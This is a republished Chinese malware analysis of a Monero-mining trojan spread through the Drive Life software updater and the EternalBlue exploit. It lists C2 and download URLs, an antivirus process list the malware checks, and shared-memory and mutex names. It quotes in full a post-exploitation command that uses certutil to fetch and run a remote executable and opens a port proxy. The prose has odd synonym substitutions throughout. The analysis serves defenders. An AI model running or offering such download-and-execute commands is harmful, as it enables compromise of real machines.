“驱动人生”木马详细分析讲演 2小时沾染10万台电脑挖门罗币

腾讯安全御见要挟情报中心监测发现，一款通过“驱动人生”进级通道，并同时应用“永恒之蓝”高危漏洞传布的木马骤然暴发，仅2个小时受袭击用户就高达10万。“驱动人生”木马会应用高危漏洞在企业内网呈蠕虫式传布，并进一步下载云控木马，在中毒电脑进行门罗币挖矿。

一、概述文章源自微观生活（93wg.com）微观生活-https://93wg.com/12699.html

12月14日下昼，腾讯安全御见要挟情报中心监测发现，一款通过“驱动人生”进级通道，并同时应用“永恒之蓝”高危漏洞传布的木马骤然暴发，仅2个小时受袭击用户就高达10万。文章源自微观生活（93wg.com）微观生活-https://93wg.com/12699.html

“驱动人生”木马会应用高危漏洞在企业内网呈蠕虫式传布，并进一步下载云控木马，在中毒电脑上进行门罗币挖矿。云控木马对企业信息安全要挟巨大，企业用户须重点关注。文章源自微观生活（93wg.com）微观生活-https://93wg.com/12699.html

该病毒暴发恰好是周末时间，令企业网管猝不及防，周一工作日员工电脑开机后，建议立刻查杀病毒，再使用杀毒软件的漏洞修复功能安装系统补钉。个人电脑用户使用腾讯电脑管家便可防御。文章源自微观生活（93wg.com）微观生活-https://93wg.com/12699.html

本次病毒暴发有三个特色：文章源自微观生活（93wg.com）微观生活-https://93wg.com/12699.html

1.驱动人生进级通道传布的病毒会在中毒电脑安装云控木马；文章源自微观生活（93wg.com）微观生活-https://93wg.com/12699.html

2.病毒会应用永恒之蓝漏洞在局域网内主动分散；文章源自微观生活（93wg.com）微观生活-https://93wg.com/12699.html

3.通过云端节制搜集中毒电脑部份信息，接受云端指令在中毒电脑进行门罗币挖矿。文章源自微观生活（93wg.com）微观生活-https://93wg.com/12699.html

木马袭击流程图文章源自微观生活（93wg.com）微观生活-https://93wg.com/12699.html

二、详细分析文章源自微观生活（93wg.com）微观生活-https://93wg.com/12699.html

dtlupg.exe走访下列url下载病毒

hxxp://xxxx.update.ackng.com/ziptool/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe

hxxp://xxxx.update.ackng.com/calendar/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe

（注意，为防止网友点击以上链接可以直接下载病毒程序，对部份字符做了暗藏处理）

病毒文件释放在：

C:\\Program Files (x86)\\DTLSoft\\rili\\Updater\\ctrlf\\f79cb9d2893b254cc75dfb7f3e454a69.exe等位置执行。

f79cb9d2893b254cc75dfb7f3e454a69.exe 运行后终究释放出 C:\\WINDOWS\\Temp\\svvhost.exe

（MD5：2E9710A4B9CBA3CD11E977AF87570E3B）运行，svvhost.exe打包了“永恒之蓝”等漏洞袭击工具在内外网进一步分散。

2.1 病毒母体

F79CB9D2893B254CC75DFB7F3E454A69.exe

运行后将本身拷贝到C:\\windows\\system32\\svhost.exe，安装为服务并启动，服务名为Ddiver，并在随后拉起云控模块svhhost.exe、袭击模块svvhost.exe。

运行时先检测互斥体，肯定是不是已沾染过。

通过检测下列过程将杀软信息收集筹备上传。

360tray.exe|360sd.exe|avp.exe|KvMonXP.exe|RavMonD.exe|Mcshield.exe|egui.exe|kxetray.exe|knsdtray.exe|TMBMSRV.exe|avcenter.exe|ashDisp.exe|rtvscan.exe|ksafe.exe|QQPCRTP.exe

检测到任务管理器及游戏过程则将云控模块svhhost.exe退出。

打开互斥体，对象名称为\"I am tHe xmr reporter\" ，xmr意指xmrig.exe矿机。

收集系统敏感信息上传到hxxp://i.haqo.net/i.png,并接受返回的云控代码等待执行。

母体设置过程同享内存HSKALWOEDJSLALQEOD

2.2 挖矿

云控木马svhhost.exe其主要功能是，从母体过程svhost.exe同享内存中读取shellcode解密并执行，每一隔2000秒读取一次同享内存中的shellcode进行解密执行，同享内存名为HSKALWOEDJSLALQEOD，目前该shellcode主要功能挖矿,不排除了后期会拉取其他更为歹意如加密勒索等木马病毒执行

云控木马执行流程

云控木马运行后会创立一个线程，该线程函数主要功能是判断过程svhost.exe(母体过程)是不是存在，不存在的话则启动该过程，接下来要读取的同享内存数据就是从该过程进行读取

创立线程判断母体过程是不是存在

调用OpenFileMappingA打开同享内存，读取同享内存数据

读取同享内存数据

调用RtlDecompressBuffer函数解压同享内存中的数据，为下一步执行做筹备

解压同享内存数据

同享内存数据加压完后会执行，目前该shellcode主要功能挖矿,不排除了后期会拉取其他更为歹意如加密勒索等木马病毒执行

执行shellcode

尝试挖矿时通讯IP为172.105.204.237

2.3 袭击模块

袭击模块从地址hxxp://dl.haqo.net/eb.exez下载，作为子过程Svvhost.Exe启动，分析发现该文件是通过python实现的“永恒之蓝”漏洞应用模块压缩打包程序。

子过程Svvhost.Exe为将python实现的“永恒之蓝”漏洞应用模块压缩打包程序。

Mysmb.pyo为袭击时扫描代码。

GitHub上也能够看到相关开源代码

扫描内网445端口进行袭击

不但袭击内网漏洞机器，还随机找几个外网IP尝试袭击，1次袭击完后默然20分钟

袭击胜利后paylaod在中招机器执行下列命令进行内网分散传布

cmd.exe /c certutil -urlcache -split -f http://dl.haqo.net/dl.exe c:/install.exe&c:/install.exe&netsh firewall add portopening tcp 65531 DNS&netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53

安全建议

1. 服务器暂时关闭没必要的端口（如135、139、445），办法可参考：https://guanjia.qq.com/web_clinic/s8/585.html

2. 企业用户在周一上班后，建议使用腾讯御点查杀病毒（个人用户可以使用腾讯电脑管家），然后使用漏洞修复功能，修复全网终端存在的系统高危漏洞；

3. 服务器使用高强度密码，切勿使用弱口令，避免黑客暴力破解；

4. 使用杀毒软件拦截可能的病毒袭击；

5. 举荐企业用户部署腾讯御界高档要挟检测系统防御可能的黑客袭击。御界高档要挟检测系统，是基于腾讯反病毒试验室的安全能力、依靠腾讯在云以及端的海量数据，研发出的独特要挟情报以及歹意检测模型系统。

以上就是微观生活（93wg.com）关于““驱动人生”木马详细分析讲演 2小时沾染10万台电脑挖门罗币”的详细内容，希望对大家有所帮助！